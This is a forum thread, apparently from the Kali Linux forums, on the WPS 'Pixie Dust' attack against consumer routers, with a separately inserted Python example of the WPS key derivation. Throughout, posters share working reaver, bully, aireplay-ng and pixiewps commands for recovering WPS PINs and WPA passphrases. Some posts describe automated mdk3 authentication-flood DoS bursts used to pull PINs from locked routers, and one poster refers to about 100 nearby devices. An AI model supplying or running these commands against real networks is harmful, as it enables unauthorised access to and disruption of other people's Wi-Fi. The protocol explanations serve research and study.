Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-600/REVA/DIR-600_FIRMWARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?

You had a device with a strange E-Nonce that followed the XX:XX:00:00:XX:XX:00:00... pattern right? If so, can you grab like 5-10 sets of data? (Use PixieLoop mode in Reaver so you don't get locked out)

DetmL
2015-06-10, 03:49
You had a device with a strange E-Nonce that followed the XX:XX:00:00:XX:XX:00:00... pattern right? If so, can you grab like 5-10 sets of data? (Use PixieLoop mode in Reaver so you don't get locked out)

http://www.mediafire.com/download/l8b3gb98k474c3l/Pixie

soxrok2212
2015-06-10, 04:17
http://www.mediafire.com/download/l8b3gb98k474c3l/Pixie

Awesome thanks!

bahha
2015-06-14, 12:24
On some Technicolor routers the modified reaver recovers the pin but not the passphrase; it freezes on:


[+] Running reaver with the correct pin, wait ...
[+] Cmd : reaver -i wlan1mon -b 18:17:25:xx:xx:xx -c 11 -s y -vv -p xxxxxxxx
[Reaver Test] [+] BSSID: 18:17:25:xx:xx:xx
[Reaver Test] [+] Channel: 11


If such a thing happens, use bully to recover it.
Example:

bully -b 18:17:25:xx:xx:xx -c 11 -B -v 2 -p xxxxxxxx

It worked for me.

kcdtv
2015-06-14, 12:52
Try to add -n to your reaver line
(by the way, that is not a pixie dust issue and it should be posted somewhere else ;) )

blitzatc
2015-06-14, 17:38
What also works is running aireplay-ng to force an association with the AP while you run reaver.
example:

aireplay-ng -1 12 -a <BSSID OF AP> -h <MAC ADDR. OF WIFI CARD> mon0

bora
2015-06-27, 21:29
I have a TP Link router which I cannot break. Brute forcing also doesn't work. And I have to say that this is the only router that outputs e-s1 and e-s2.
I can see in my area about 100 devices and only this TP Link outputs e-s1 and e-s2. My other router is Arcadyan with RT2860 chipset and I can read Authkey, PKE, etc... but e-s1 and e-s2 are never displayed by reaver.
Is there a way to force displaying e-s1 and e-s2 ?
Pixiewps description says that Ralink chipset never generates e-s1 and e-s2 and they are always zero. How do I run pixiewps in this case?

here is a gist with reaver output of TP LINK WR841N
https://gist.github.com/anonymous/6184dc4f7f9fe19ef46d

wn722
2015-07-01, 16:03
oh could there be progress with Atheros stuff???

soxrok2212
2015-07-21, 20:39
oh could there be progress with Atheros stuff???
Maybe with the Tick Tock attack, but then again there are a lot of prerequisites for the attack to work, and it will really just optimize the regular 2011 online brute force. But you never know!

Gurgg
2015-07-26, 15:50
I think this may not be the correct space to ask for help with my issue; going to make a new thread sorry! please delete

soxrok2212
2015-07-26, 16:21
Anyone familiar with IDA Pro or binwalk or examining firmwares in general?

I found some interesting articles and documents highlighting flaws in /dev/random in embedded systems, thought I'd share with you. If you are not experienced, you probably won't understand much of it (that's me) but from what I understand, embedded systems from before July 2012 (or maybe even after) may be potentially vulnerable as they don't have a sufficient amount of entropy after being plugged in. The problem with newer devices (not sure about older devices) is that upon reboot, they save the entropy pool through a reboot/power loss. This is why forcing/DOSing an AP so it reboots is not effective in clearing entropy pools. I'm not sure if the same feature exists in pre-2012 devices so it may be something worth looking into. Heck, it's even something Dominique noted in his presentations.

I guess one of the maintainers of /dev/random in Linux commented on his worries about the subject here: https://news.ycombinator.com/item?id=6548893

And the whole conference is available here: https://factorable.net/weakkeys12.conference.pdf

What's even more intriguing about this is older hardware is more susceptible to DOS/force rebooting. The research paper explains how there were a lot of duplicate security keys used in various embedded systems, including "enterprise-grade routers from Cisco; server management cards from Dell, Hewlett-Packard, and IBM; virtual-private-network (VPN) devices; building security systems; network attached storage devices; and several kinds of consumer routers and VoIP products" (quoted from conference.pdf). This is what made them question the implementation. If there are a lot of duplicate keys, then there must not have been sufficient entropy feeding the PRNGs.

t6_x has ventured into the realm of Atheros devices and found that in hostapd, the WPS protocol is stopped before sending the M3 message if there is not sufficient entropy.

As you can see, there are many barriers to break, but much possibility for older devices, or maybe even newer devices if they don't include the patch released following the research. I mean, some manufacturers had zero security so anything is possible!

mmusket33
2015-07-29, 04:08
To soxrok2212

As we have noted to you in e-mails regarding field experiments on opening a WPS-locked system: this DOS/forced rebooting does not seem to result in a total router reboot and the removal of the WPS locking mechanism. Rather it seems to affect the internal systems, allowing for the collection of a small number of pins after the router is subjected to a short (15-20 sec) but intense DDOS process. Hence the WPS system always shows a locked state but small numbers of WPS pins can be collected after a DDOS and rest period. Usually approx 5 to 10 pins can be harvested every 360 seconds as a general rule.

Furthermore this short DDOS process sometimes results in the WPS pin resetting to 12345670. We have embedded this pin retest function into the VMR-MDK process which can considerably shorten the attack time required.


In field trials we have been getting good results from our lab variant VMR-MDK011x8 that we sent you which employs pixiedustwps1.1 and the automatic adding of any WPS pin found into the 4 stage attack process as well. However this is not a magic bullet and only a subset of routers are vulnerable to this approach.

MTeams

lllhamedlll
2015-07-29, 19:26
Hi,
I have a question:
for offline cracking you need the KeyWrapKey and AuthKey? How can you find them?

thanks for help!

soxrok2212
2015-07-30, 22:12
Hi,
I have a question:
for offline cracking you need the KeyWrapKey and AuthKey? How can you find them?

thanks for help!

You don't need the KeyWrapKey. It is used for making a bunch of other keys. The Authkey is printed in reaver, which is also included in Kali. Use -vvv for the verbosity mode.

lllhamedlll
2015-07-31, 06:51
You don't need the KeyWrapKey. It is used for making a bunch of other keys. The Authkey is printed in reaver, which is also included in Kali. Use -vvv for the verbosity mode.

Thanks... and how can we derive AuthKey manually, before starting the attack?
We have KDK = HMAC-SHA-256_DHKey(N1 || EnrolleeMAC || N2)... DHKey = SHA-256(g^(AB) mod p)... and

AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

so we should know the values on the right side of the equation... so we have AuthKey.... right??

I want to study the attack in detail... thanks...

soxrok2212
2015-07-31, 17:42
Thanks... and how can we derive AuthKey manually, before starting the attack?
We have KDK = HMAC-SHA-256_DHKey(N1 || EnrolleeMAC || N2)... DHKey = SHA-256(g^(AB) mod p)... and

AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

so we should know the values on the right side of the equation... so we have AuthKey.... right??

I want to study the attack in detail... thanks...

All the answers to your questions can be found here: http://cfile28.uf.tistory.com/attach/16132E3C50FCFFCB3EC74E

Look on page 37.

You can also watch Dominique's video: http://video.adm.ntnu.no/pres/549931214e18d and look at his slides: http://archive.hack.lu/2014/Hacklu2014_offline_bruteforce_attack_on_wps.pdf

They'll help you a lot :) Glad to see someone who, like me, wants to understand the attack rather than just do it :D

wiire
2015-07-31, 17:46
Thanks... and how can we derive AuthKey manually, before starting the attack?
We have KDK = HMAC-SHA-256_DHKey(N1 || EnrolleeMAC || N2)... DHKey = SHA-256(g^(AB) mod p)... and

AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

so we should know the values on the right side of the equation... so we have AuthKey.... right??

I want to study the attack in detail... thanks...

The WPS protocol uses the Diffie-Hellman key exchange, which is a method of securely exchanging cryptographic keys over a public channel. The AP wants to talk to the Client but they don't want anyone else to be able to eavesdrop on their conversation.

To accomplish this, they both generate a pair of keys (a public key and a private key):

- First the AP generates a (hopefully) random private key (A).
- Then it generates its public key, PKe = g^A mod p, where g and p are known and described by the WPS protocol, and sends it to the Client (with M1).

Now, it's the turn of the Client to generate its pair of keys:
- random private key (B)
- PKr = g^B mod p, and sends PKr to the AP (with M2).

At this point they both have each others public key and find the 'shared secret', a common key used to set up a secure channel.

To find the shared secret (g^(AB) mod p):
- the AP does: shared_secret = PKr^A mod p (which is equal to g^(AB) mod p)
- the Client does: shared_secret = PKe^B mod p (which is equal to g^(AB) mod p)

It may seem like magic at first but it's simple math.

From this point on the WPS protocol imposes these steps:
- DHKey = SHA-256(shared_secret)
- KDK = HMAC-SHA-256{DHKey}(Enrollee nonce || Enrollee MAC || Registrar nonce), DHKey is used as key for the hash function
- AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

where || denotes concatenation (kdf outputs a sequence of bytes, the first 256 are for AuthKey...).

AuthKey stands for Authentication session Key and it is, in fact, a session key.

Now if you are thinking of something like, "I sniff packets with Wireshark and then I generate AuthKey with the data collected". No, you can't. The Diffie-Hellman key exchange does not allow eavesdropping. It all starts with the pair of keys (public and private). To get to AuthKey you need the private key of one of the two involved entities (AP or Client). So Pixiewps needs AuthKey to work, which is provided by Reaver/Bully.

After M2 (before M3) they both have a secure channel to talk in.

However, Reaver >= 1.3 has a feature called "Small Diffie-Hellman keys" (-S, --dh-small). Enabling this feature causes Reaver to choose a static, not random private key, specifically the number 1.

So if we use this feature with Reaver then the shared_secret becomes: g^(AB) mod p = PKe^B mod p = PKe mod p = PKe (g = 2, B = 1, p > 2).

PKe is calculated as g^A mod p, meaning that, PKe mod p = PKe (< p).

EDIT: of course you can calculate AuthKey every time you know the private number (it doesn't have to be 1). With 1 it's just simpler.
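The derivation wiire lays out, carried through as an added example that is not Reaver, Bully or pixiewps code: both sides of the WPS Diffie-Hellman exchange arrive at the same AuthKey, and with Reaver's --dh-small private key of 1 the shared secret collapses to PKe itself. The group is the 1536-bit MODP group from RFC 3526 that WPS uses; the private exponent, nonces and MAC below are constructed.

```python
"""WPS (WSC) key derivation from the Diffie-Hellman exchange described above.
Added example; the private exponent, nonces and MAC are constructed."""
import hashlib
import hmac

# 1536-bit MODP group (RFC 3526), generator 2: the DH group WPS uses.
WPS_P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05"
    "98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB"
    "9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF",
    16,
)
WPS_G = 2
KEY_LEN = 192  # bytes of a 1536-bit value as carried in M1/M2 (PKe/PKr)
KDF_LABEL = b"Wi-Fi Easy and Secure Key Derivation"


def public_key(private):
    """g^private mod p: PKe for the AP (enrollee) or PKr for the registrar."""
    return pow(WPS_G, private, WPS_P)


def shared_secret(peer_public, private):
    """peer_public^private mod p, which is g^(AB) mod p on both sides."""
    return pow(peer_public, private, WPS_P)


def wps_kdf(key, label, total_bits):
    """WSC kdf: concatenate HMAC-SHA-256(key, i || label || total_bits) for
    i = 1, 2, ... until total_bits have been produced; i and total_bits are
    32-bit big-endian integers."""
    out = b""
    for i in range(1, (total_bits + 255) // 256 + 1):
        msg = i.to_bytes(4, "big") + label + total_bits.to_bytes(4, "big")
        out += hmac.new(key, msg, hashlib.sha256).digest()
    return out[: total_bits // 8]


def derive_keys(secret, e_nonce, e_mac, r_nonce):
    """DHKey, KDK and the 640-bit split AuthKey || KeyWrapKey || EMSK."""
    dhkey = hashlib.sha256(secret.to_bytes(KEY_LEN, "big")).digest()
    kdk = hmac.new(dhkey, e_nonce + e_mac + r_nonce, hashlib.sha256).digest()
    material = wps_kdf(kdk, KDF_LABEL, 640)
    return {
        "AuthKey": material[:32],       # 256 bits
        "KeyWrapKey": material[32:48],  # 128 bits
        "EMSK": material[48:80],        # 256 bits
    }


def exchange(enrollee_private, registrar_private, e_nonce, e_mac, r_nonce):
    """Run both sides of the exchange and return what each side derived."""
    pke = public_key(enrollee_private)   # sent by the AP in M1
    pkr = public_key(registrar_private)  # sent by the client in M2
    ap_keys = derive_keys(shared_secret(pkr, enrollee_private),
                          e_nonce, e_mac, r_nonce)
    client_keys = derive_keys(shared_secret(pke, registrar_private),
                              e_nonce, e_mac, r_nonce)
    return {"PKe": pke, "PKr": pkr, "ap": ap_keys, "client": client_keys}


# Constructed sample values; none of them come from a real capture.
ENROLLEE_PRIVATE = int("9f3a7c1e5b2d8046e7c3a1f5d9b8e2c4", 16)
E_NONCE = bytes.fromhex("7c3e91a0f45b28d6c1e7935a0b4f6d82")
R_NONCE = bytes.fromhex("d94a16f8e2c07b35a6e1f04c8d2b9e73")
E_MAC = bytes.fromhex("001122334455")  # placeholder AP MAC


def demo(registrar_private=1):
    """registrar_private=1 mimics Reaver's --dh-small: PKr is then 2 and the
    shared secret is PKe itself, yet both sides still agree on AuthKey."""
    result = exchange(ENROLLEE_PRIVATE, registrar_private, E_NONCE, E_MAC, R_NONCE)
    return {
        "authkey_hex": result["ap"]["AuthKey"].hex(),
        "sides_agree": result["ap"] == result["client"],
        "secret_is_pke": shared_secret(result["PKe"], registrar_private) == result["PKe"],
        "pkr_is_two": result["PKr"] == 2,
    }


if __name__ == "__main__":
    for priv in (1, 123456789):
        print(f"registrar private key {priv}: {demo(priv)}")
```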

lllhamedlll
2015-07-31, 19:44
All the answers to your questions can be found here: http://cfile28.uf.tistory.com/attach/16132E3C50FCFFCB3EC74E

Look on page 37....


The WPS protocol uses the Diffie-Hellman key exchange, which is a method of securely exchanging cryptographic keys over a public channel. Alice wants to talk to Bob but they don't want anyone else to be able to eavesdrop on their conversation....


thanks soxrok2212 !!!

I will study them... :)

and of course thanks to wiire !!!

I think it is not possible to explain it better... :D

is this the last and best attack on WPS or not?

zen4
2015-08-08, 09:37
Are these scripts supposed to work on NetHunter? Sorry for the bad capture, I couldn't do it any other way, but you see the point: I can't use either mdk3 from Kali or the one by Team Musket after make install mdk3-v6.

soxrok2212
2015-08-21, 02:20
I don't know, my only pentesting platform is Kali on my laptop. You'd have to ask in the nethunter part of this forum.

adelmajid
2015-08-22, 07:35
thank you very much

therookie9
2015-08-24, 22:22
Hi

I run reaver -i wlan0mon -c xx -b mac -K 1

on 3 of my routers. I have a D-Link, a Netgear and a Belkin; it completes but only finds the password on the older Belkin router, and on the others it says PIN NOT FOUND.

Am I doing something wrong, or is this normal and this type of attack no longer works on newer routers? Is there anything better to try?

Thanks

Dab0y
2015-09-02, 02:33
anyone tried TP-Link devices?
I got some 740 and 841 and it's zip.

I've tried many times with TP-Link devices and no luck :confused:...
When I'm playing with Wireshark and looking, TP-Link chipsets mostly use Atheros :p

lllhamedlll
2015-09-02, 14:45
I can't find an answer to my question anywhere... and can't message anyone in this forum... so I'm forced to ask here:
In the PBC method the enrollee doesn't know any secret value... just press the button and finish!... So how is it possible to send the M3 message, or M5 or M7? It seems that in this method sending these values is not necessary!

aanarchyy
2015-09-02, 17:37
From what I've seen, even a Push Button Event is still a normal Wps transaction. It still runs through the whole M1 through M8, it will just accept I think any pin you throw at it. I tested that a while ago. PBE, then with reaver I tried pin 00000000 and it went through successfully as a full Wps transaction and retrieved the psk.

meltdown
2015-09-02, 20:41
Hi

I run reaver -i wlan0mon -c xx -b mac -K 1

on 3 of my routers. I have a D-Link, a Netgear and a Belkin; it completes but only finds the password on the older Belkin router, and on the others it says PIN NOT FOUND.

Am I doing something wrong, or is this normal and this type of attack no longer works on newer routers? Is there anything better to try?

Thanks

This means your router is invulnerable to Pixie Dust Attack

blackdream
2015-09-18, 07:01
Hi soxrok2212 !!!

Thanks for the WPS Pixie Dust Database.xls file. In column F (Vulnerable?) = No. Does it mean the specified chip won't be vulnerable with the -f option also, or just with the -K option of reaver?

soxrok2212
2015-09-18, 19:21
Hi soxrok2212 !!!

Thanks for the WPS Pixie Dust Database.xls file. In column F (Vulnerable?) = No. Does it mean the specified chip won't be vulnerable with the -f option also, or just with the -K option of reaver?

I think you are a bit confused here, -f is ONLY for Realtek devices when E-S1 and E-S2 are not generated within the same second, or within a few seconds of the Nonce. All -f does is it runs all the possible seeds through the PRNG (seeds in this specific case are time in seconds since Epoch). -f is NOT a solution to any router, ONLY Realtek when E-S1 and E-S2 are not generated the same second, or within a few seconds of the Nonce. In the database, "No" means that the specified AP is NOT currently vulnerable to the Pixie Dust attack.

blackdream
2015-09-20, 05:36
Thank you soxrok2212 !!

Quest
2015-10-12, 18:41
Just re-installed KL1.1.0a, and when trying to apt-get install, libssl-dev, libpcap-dev and libsqlite3-dev I get this..


root@kali:~# apt-get install libssl-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
libssl-dev is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@kali:~# apt-get install libpcap-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package libpcap-dev
root@kali:~# apt-get install libsqlite3-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package libsqlite3-dev
root@kali:~#


Any ideas?

Laserman75
2015-10-12, 19:45
sudo gedit /etc/apt/sources.list



Code:

#

# deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150811-08:02]/ sana contrib main non-free

#deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150811-08:02]/ sana contrib main non-free

deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free

deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

deb http://http.kali.org/kali sana main non-free contrib

deb http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free

deb http://repository.spotify.com stable non-free



and

sudo apt-get install linux-headers-$(uname -r)

Quest
2015-10-12, 19:50
Thanks Laserman75, I was afraid that "sudo apt-get install linux-headers-$(uname -r)" would break my installation since it's not the latest Kali. Same for those "sana" repos I presume? It will all work with KL1.1.0a ??

Edit: I do not want to upgrade to KL2. That is the whole point of reinstalling 1.1.0

Edit2: anyways I've installed manually and everything works beautifully..

https://packages.debian.org/wheezy/libsqlite3-dev and searched for each reaver/pixie dependency 'wheezy' package and downloaded them. Then installed in that order..

dpkg -i libc6-dev_2.13-38+deb7u8_amd64.deb
dpkg -i libpcap0.8-dev_1.3.0-1_amd64.deb
dpkg -i libpcap-dev_1.3.0-1_all.deb
dpkg -i libsqlite3-0_3.7.13-1+deb7u2_amd64.deb
dpkg -i libsqlite3-dev_3.7.13-1+deb7u2_amd64.deb
dpkg -i libssl1.0.0_1.0.1e-2+deb7u17_amd64.deb
dpkg -i libssl-dev_1.0.1e-2+deb7u17_amd64.deb

Nice to see mon0 again :)

soxrok2212
2015-10-12, 22:09
thanks Laserman75, was afraid that "sudo apt-get install linux-headers-$(uname -r)" would break my installation since it's not the latest Kali. Same for those "sana" repos I presume? Will it all work with KL1.1.0a??

Edit: I do not want to upgrade to KL2. That is the whole point of reinstalling 1.1.0

Edit2: anyways I've installed manually and everything works beautifully..

https://packages.debian.org/wheezy/libsqlite3-dev and searched for each reaver/pixie dependency 'wheezy' package and downloaded them. Then installed in that order..

dpkg -i libc6-dev_2.13-38+deb7u8_amd64.deb
dpkg -i libpcap0.8-dev_1.3.0-1_amd64.deb
dpkg -i libpcap-dev_1.3.0-1_all.deb
dpkg -i libsqlite3-0_3.7.13-1+deb7u2_amd64.deb
dpkg -i libsqlite3-dev_3.7.13-1+deb7u2_amd64.deb
dpkg -i libssl1.0.0_1.0.1e-2+deb7u17_amd64.deb
dpkg -i libssl-dev_1.0.1e-2+deb7u17_amd64.deb

Nice to see mon0 again :)

So are you all set then?

Quest
2015-10-12, 22:28
yup set and happy to see 1.1.0

soxrok2212
2015-10-12, 22:41
yup set and happy to see 1.1.0

Awesome, I am also considering building a new rig, if i can find the money... wondering if I should go with 1.1.0 or 2.0...

Quest
2015-10-12, 22:58
strange situation we are in. The good news is: one does not prevent the other. As a main OS though... good luck with that. What they were thinking upstream worries me a bit more... Wish I'd be a bit more constructive, but really I'm lost (more than usual).

soxrok2212
2015-11-21, 22:48
I'd just like to leave a comment here, as of today, November 21, 2015, 56/96 devices reported have been confirmed vulnerable. That's 58.3%! While I assure you this is not real-world accurate as people probably don't report as many failed tests as successful test, these are still some pretty high numbers! If you manage to find more, both vulnerable and not vulnerable, please report here! Thanks! https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit#gid=2048815923

soxrok2212
2015-12-19, 05:45
Don't get discouraged, this is nothing new, and probably won't turn out to be anything sufficient but you miss 100% of the shots you don't take so I might as well try.

Tonight I was doing some research on the LRNG (Linux Random Number Generator) and I came across this interesting document http://eprint.iacr.org/2006/086.pdf

It highlights how the LRNG works in various systems, embedded systems, and directly (but briefly) targets OpenWRT. Mind you I don't have a degree in Computer Science, nor Computer Security bla bla bla, but according to this document, the ONLY source of entropy in kernel 2.6.10 (yes it is pretty old) is from network traffic. Apparently in this version, entropy was not carried across reboots, though I believe most current networking devices that run Linux do save it now, but let's not jump to conclusions yet. I haven't finished reading the whole document as it is very late but I figured I'd share to see what you maybe more, maybe less advanced people think.

Even if this practically exists across a small fraction of routers still in use today, it certainly seems to be something worth looking into. Let me know what you think!

Quest
2015-12-21, 02:48
not often I've witnessed a concept based upon vague and obscure notions actually materialize into workable software.

When I first posted I was both interested and skeptical. The skeptical part was proven wrong and quickly dissipated as it unbelievably, happened. This thread is where the actual, workable, revolutionary and delicious program was born, only because soxrok2212 understood then the potential and the mechanics of the Pixie attack well enough to gather the energies here to make it happen for us all. So many thanks guys! To Dominique Bongard for the original R&D, wiire for the actual software that we, common mortal use, DataHead, t6_x, aanarchyy, FrostyHacks, and soxrok2212 for the leadership, but most importantly, your Jedi skills.

Cheers!!

soxrok2212
2015-12-27, 00:57
Wasn't just me, primarily Datahead. He was my inspiration, he had all the concepts understood before I did (way before I did, in fact) and he really deserves the trophy on this one. Had it not been for him, I think I would've given up. No I am not just saying this to be nice, it was really Datahead all along, look at me as just the "messenger". Bongard provided the materials, Datahead provided the major concepts I was missing, FrostyHacks also helped me with some pieces I didn't have a grip on, aanarchyy is a bro and kept me inspired all along and provided some critical testing devices, and wiire made it all happen (publicly). But really, hats off to Datahead :)

soxrok2212
2015-12-31, 05:27
More speculation about attacking the Linux Random Number Generator... probably just me rambling because it's late, but why not post? Anyways, my understanding on this post comes from here: http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Gutterman.pdf

Now, not being an avid user of OpenWRT, I can't say how much of the research and discovery in this document is still true, but it can't hurt to try. Gutterman, the author of this document claims that both /dev/random and /dev/urandom draw from the same entropy pool. What is the difference between, /dev/random and /dev/urandom? Well, when entropy is low in the entropy pool, /dev/random blocks output until there is sufficient entropy while /dev/urandom will always output data (this is true of all devices using the Linux RNG). Now, if I tell you that Hostapd's WPS implementation uses /dev/random, what do you think? Ponder this a minute before reading the next sentence, see if your gears start ticking!

If we attack an arbitrary protocol that uses /dev/urandom, we can effectively drain the entropy pool without running the WPS protocol and risking lockouts/timeouts/etc. Before anything though, there are a few things that we have to consider, so don't get too excited (most of this is probably just me rambling).

-The WPA/WPA2 protocol: nonces are generated, and it wouldn't seem reasonable to use /dev/random because a device would not be able to join a network assuming a router was just installed, no entropy has been generated and a device wants to join. Could we attack this protocol to drain the entropy pool? Guess we'll have to find out!

-When will the LRNG/WPS protocol stop blocking? How much entropy is required to be able to use the entropy?

-What are sources of entropy in an embedded system such as a wireless router? LAN traffic? WAN traffic? Would WAN traffic make sense in a non-internet connected setup? What if temporary networks are set up and never have internet access? (Lan parties?) There are no hard drives, mice, keyboards or other peripherals in these types of embedded systems (yes a large amount of routers have USB ports, but it can't be assumed that all consumers actually use them).

-Do entropy pools save across reboots? While I don't know of a stone cold answer, t6_x leads me to believe in recent versions of Linux they do.

Update about an hour later: I just remembered that Bongard actually noted something on his slide presentation, low entropy across boot, making note of common states after reboot, though it's something he didn't really touch on. Maybe I'm actually onto something...

mmusket33
2015-12-31, 11:20
Ref dev/random and dev/urandom

Maybe you are answering a question MTeams has had for a long time. First, we are seeing a lot of WPS pin cracks at 12345670, the default first pin. We have hacked through the router username and password and found the pin to be set to another pin.

Maybe if dev/random does not have enough random data (you call it entropy) to produce a random number then the firmware just defaults the pin to 12345670, or in the case of dev/urandom the lack of randomness due to insufficient data results in a default pin being produced. Hence heavy DDOS of the router with processes like mdk3 a (Authentication DoS mode) may in some cases overload the firmware and the dev/random processes themselves fail. Hence it is not necessary to actually reset the router - just deplete it of the time to produce complete random numbers and certain operations can again be conducted.

You may have also answered the question as to why the VMR-MDK series works, as when you flood the router with short bursts of mdk3 a WPS router sometimes gives up more pins even when locked.

We should look at tying up the router processes rather than attempting a reset.

MTeams

soxrok2212
2016-01-02, 20:41
Ref dev/random and dev/urandom

Maybe you are answering a question MTeams has had for a long time. First, we are seeing a lot of WPS pin cracks at 12345670, the default first pin. We have hacked through the router username and password and found the pin to be set to another pin.

Maybe if dev/random does not have enough random data (you call it entropy) to produce a random number then the firmware just defaults the pin to 12345670, or in the case of dev/urandom the lack of randomness due to insufficient data results in a default pin being produced. Hence heavy DDOS of the router with processes like mdk3 a (Authentication DoS mode) may in some cases overload the firmware and the dev/random processes themselves fail. Hence it is not necessary to actually reset the router - just deplete it of the time to produce complete random numbers and certain operations can again be conducted.

You may have also answered the question as to why the VMR-MDK series works, as when you flood the router with short bursts of mdk3 a WPS router sometimes gives up more pins even when locked.

We should look at tying up the router processes rather than attempting a reset.

MTeams

Not sure about this theory but it sure is interesting. Entropy doesn't affect the pin, it affects the secure keys used to protect the pin. Are you able to send me a pixielog of an instance where pin 12345670 is used instead of the sticker pin?

mmusket33
2016-01-03, 11:59
To soxrok2212

We will begin checking all the router firmware settings for those routers we can access. We have been seeing the pin reset on occasion. Sometimes during a reaver attack the router resets the pin to 12345670. As reaver checks this pin at the beginning of the attack, reaver then climbs to 99% and spins endlessly as it cannot find the pin. In such a case we would either add --pin=12345670 to the command line or simply restart a new reaver attack from the start. Reaver would then crack the WPA code when it checked 12345670. It happened enough for us to write a retest-pin-12345670 feature in VMR-MDK.

If you remember, we previously mentioned to you that if you run mdk3 type alpha (i.e. type a DDOS) using the same wifi device, i.e. mon0 or wlan0mon, as used with reaver, reaver can extract pins through the mdk3 fog. If you use a different device to run mdk3, then reaver cannot access the router.

In response to your publication of papers dealing with depleting dev/random processes we stopped all other projects and immediately began running tests with simultaneous reaver/mdk3 attacks against WPS locked routers and/or routers which did not respond to reaver even when they were open.

Even after 24 hours of tests we are seeing interesting results.

1. Some WPS locked routers gave up some pins

2. Open WPS enabled routers which do not respond at all to reaver begin responding.

3. DDOS during a reaver attack seems to cause some routers to jump channels when DDOSing them alone did not cause channel switching, and such channel switching always resulted in more WPS pins collected in cases where the router was locked.

We have only tested this on a few targets.

We suggest running reaver for say 180 seconds and mdk3 type alpha DDOS at the same time for 30 seconds. Thirty seconds after the reaver/mdk3 start, mdk3 terminates and reaver continues for 150 seconds and then restarts.

As some WPS locked routers have been giving up pins slowly, we are trying to find a way to keep the pin collection going. We will write these routines into varmacscan??.sh, which will automate the process and give us a wider target base for checking, and we will begin recoding VMR-MDK to allow a short mdk3 process at the start of the reaver attack.

As a basic command line example:

timeout 180 reaver -i mon0 -b 55:44:33:22:11:00 -vvv

timeout 30 mdk3 mon0 a -a 55:44:33:22:11:00

shutdown processes

spoof macs

restart

These processes need to be automated

MTeams

sandyuk
2016-01-03, 14:38
Congrats and well done on the great work. I know some of you guys have put in great efforts for pixie and other projects. I have been a kali user for a few years now and a reader of the forums so hope you don't mind me asking a question.

I have successfully used reaver on some listed vulnerable hardware, giving me the E-Nonce, PKE, R-Nonce, PKR, AuthKey, E-Hash1, E-Hash2, then running pixie to give me the WPS PIN, then the WPA KEY.

However there is one hardware AP that I reaver that gives me the E-Nonce, PKE, R-Nonce, PKR, AuthKey, E-Hash1, E-Hash2 but tells me WPS PIN not found. Am I correct in thinking that the fact that I get the E-Nonce, PKE, R-Nonce, PKR, AuthKey, E-Hash1, E-Hash2 means I have everything I need and the WPS PIN is to be found? Or is it not as simple as that?

I say this because from some hardware you get nothing, no E-Nonce, PKE, R-Nonce, PKR, nothing at all. But this hardware is feeding back something, and yet reaver can't figure out the algorithm or whatever to get the WPS PIN.

I take it this hardware isn't vulnerable? And what it is spitting out is of no use at all?

Thanks in advance.

soxrok2212
2016-01-03, 15:36
The attack is based on the fact that some chipset vendors generate weak security keys to "encrypt" the pin. I don't even think encryption is the right word because it was a very pathetic attempt. Basically, some chipset manufacturers either made the encryption keys 0, or they made them predictable: they could be found from the nonce that was given to us in plaintext. In your case, you are probably trying on an invulnerable chipset manufacturer that uses a secure method of generating keys.

soxrok2212
2016-01-05, 19:03
Also, for those of you having trouble with Reaver, try Bully! https://github.com/aanarchyy/bully
AAnarchYY recently modded it to support the pixie dust attack! Much faster and will compile on many more devices natively.

Quest
2016-01-05, 20:17
hey soxrok, will the new Bully and t6_x Reaver, have to be updated for the new Pixie 1.2.2 ? Or are they completely independent??

soxrok2212
2016-01-05, 23:52
They should work fine :)

aanarchyy
2016-01-06, 00:55
Bully works just fine ;-)

Quest
2016-01-06, 02:16
well... I knew the answer to that, AH! Was just checking if you guys were paying attention and what your response time was. 2:15 is kinda slow.

*hides under the desk, pretending that I'm offline*

soxrok2212
2016-01-06, 02:33
Maybe someone here knows the answer to this, somewhere on the internets I came across a guy that claimed he found 2 vulnerable Broadcom devices.. anyone know what I'm talking about and have a link?

Kaushalrocks
2016-01-06, 17:22
How to install this new bully pixiewps on kali 2.0?
Plz send code to install it and also how to use it.
Is there any benefit over reaver or more vulnerability to other routers??
Please reply asap.

Laserman75
2016-01-06, 20:34
How to install this new bully pixiewps on kali 2.0?
Plz send code to install it and also how to use it.
Is there any benefit over reaver or more vulnerability to other routers??
Please reply asap.

wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
cd '/root/bully-master/src'
make
sudo make install

slmafiq
2016-01-07, 15:38
why can't BULLY be installed?

*youtube*

soxrok2212
2016-01-07, 15:43
why can't BULLY be installed?

*removed*



